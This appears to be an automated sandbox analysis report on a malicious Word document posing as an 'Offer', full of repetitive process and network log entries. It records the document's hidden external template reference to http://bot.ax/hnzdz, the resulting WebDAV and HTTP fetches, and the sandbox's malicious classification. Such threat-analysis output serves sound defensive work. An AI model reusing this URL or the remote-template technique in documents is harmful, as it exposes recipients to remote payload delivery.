Source: unknown	HTTPS traffic detected: 172.67.171.37:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.47.128:443 -> 192.168.2.22:49169 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E279F50C-91EA-4841-A527-8D9534FAEB24}.tmp

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /hNZdz HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: bot.axConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /hNZdz HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: bot.axConnection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: bot.ax

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:41:10 GMTContent-Type: text/html; charset=UTF-8Connection: closeset-cookie: PHPSESSID=ccqb5jblbbpgelnc46rrjjjacs; path=/expires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidatepragma: no-cacheCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eWn4AR2JlvSGXIYHhmmkBq4m0b9AN9ruCiuFGW5GrXSo3pf1ytUz5%2F4dXhkqFI2X91%2BaP9fqqSKY%2FAKuo%2FSYodhTojFaZC77pauiNowuecahNqhZ1ofoZWo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88872db6a9cd0f6b-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:41:17 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeset-cookie: PHPSESSID=8pqa1qkp3733as8k1h92tuc7et; path=/expires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidatepragma: no-cachevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zg3sDoZsaDlJ2YKgBtWaci3lH8cInlpxk2SYPdK6Pw2WOmshxm%2BqnEe4zHlQKB1chA1TOG7T4qp7l5mPW3u59W1eb4lj4OQHiv%2BtcaMYWFSUprWjrvffodk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88872dded9010dc7-EWRalt-svc: h3=":443"; ma=86400

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown	Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443

Source: unknown

HTTPS traffic detected: 104.21.47.128:443 -> 192.168.2.22:49170 version: TLS 1.2

Document misses a certain OLE stream usually present in this Microsoft Office document type

Source: ~WRF{05894FFF-9B10-4445-B3AA-6E03C6331A8D}.tmp.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: classification engine

Classification label: mal68.expl.evad.winDOC@18/29@5/3

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$fer 15492024 15602024.docx.doc

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR6BDC.tmp

Jump to behavior

Source: Offer 15492024 15602024.docx.doc	OLE indicator, Word Document stream: true
Source: Offer 15492024 15602024.docx.doc	OLE indicator, Word Document stream: true
Source: Offer 15492024 15602024.docx.doc	OLE indicator, Word Document stream: true
Source: Offer 15492024 15602024.docx.doc	OLE indicator, Word Document stream: true
Source: Offer 15492024 15602024.docx.doc	OLE indicator, Word Document stream: true
Source: Offer 15492024 15602024.docx.doc	OLE indicator, Word Document stream: true
Source: Offer 15492024 15602024.docx.doc	OLE indicator, Word Document stream: true
Source: Offer 15492024 15602024.docx.doc	OLE indicator, Word Document stream: true
Source: Offer 15492024 15602024.docx.doc	OLE indicator, Word Document stream: true
Source: Offer 15492024 15602024.docx.doc	OLE indicator, Word Document stream: true
Source: Offer 15492024 15602024.docx.doc	OLE indicator, Word Document stream: true

Source: Offer 15492024 15602024.docx.doc	OLE document summary: title field not present or empty
Source: Offer 15492024 15602024.docx.doc	OLE document summary: title field not present or empty
Source: Offer 15492024 15602024.docx.doc	OLE document summary: title field not present or empty
Source: Offer 15492024 15602024.docx.doc	OLE document summary: title field not present or empty
Source: Offer 15492024 15602024.docx.doc	OLE document summary: title field not present or empty
Source: Offer 15492024 15602024.docx.doc	OLE document summary: title field not present or empty
Source: Offer 15492024 15602024.docx.doc	OLE document summary: title field not present or empty
Source: Offer 15492024 15602024.docx.doc	OLE document summary: title field not present or empty
Source: Offer 15492024 15602024.docx.doc	OLE document summary: title field not present or empty
Source: Offer 15492024 15602024.docx.doc	OLE document summary: title field not present or empty
Source: Offer 15492024 15602024.docx.doc	OLE document summary: title field not present or empty
Source: ~WRF{05894FFF-9B10-4445-B3AA-6E03C6331A8D}.tmp.0.dr	OLE document summary: title field not present or empty
Source: ~WRF{05894FFF-9B10-4445-B3AA-6E03C6331A8D}.tmp.0.dr	OLE document summary: author field not present or empty
Source: ~WRF{05894FFF-9B10-4445-B3AA-6E03C6331A8D}.tmp.0.dr	OLE document summary: edited time not present or 0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: Offer 15492024 15602024.docx.doc

ReversingLabs: Detection: 13%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown	Jump to behavior

Source: Offer 15492024 15602024.docx.LNK.0.dr

LNK file: ..\..\..\..\..\Desktop\Offer 15492024 15602024.docx.doc

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: Offer 15492024 15602024.docx.doc	Initial sample: OLE zip file path = word/embeddings/oleObject7.bin
Source: Offer 15492024 15602024.docx.doc	Initial sample: OLE zip file path = word/embeddings/oleObject6.bin
Source: Offer 15492024 15602024.docx.doc	Initial sample: OLE zip file path = word/embeddings/oleObject5.bin
Source: Offer 15492024 15602024.docx.doc	Initial sample: OLE zip file path = word/embeddings/oleObject2.bin
Source: Offer 15492024 15602024.docx.doc	Initial sample: OLE zip file path = word/media/image2.emf
Source: Offer 15492024 15602024.docx.doc	Initial sample: OLE zip file path = word/embeddings/oleObject4.bin
Source: Offer 15492024 15602024.docx.doc	Initial sample: OLE zip file path = word/embeddings/oleObject3.bin
Source: Offer 15492024 15602024.docx.doc	Initial sample: OLE zip file path = word/_rels/settings.xml.rels

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: Offer 15492024 15602024.docx.doc

Initial sample: OLE indicators vbamacros = False

Persistence and Installation Behavior

Microsoft Office launches external ms-search protocol handler (WebDAV)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: \Device\RdpDr\;:1\bot.ax\DavWWWRoot

Jump to behavior

Contains an external reference to another file

Source: settings.xml.rels

Extracted files from sample: http://bot.ax/hnzdz

Office viewer loads remote template

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Section loaded: netapi32.dll and davhlpr.dll loaded

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
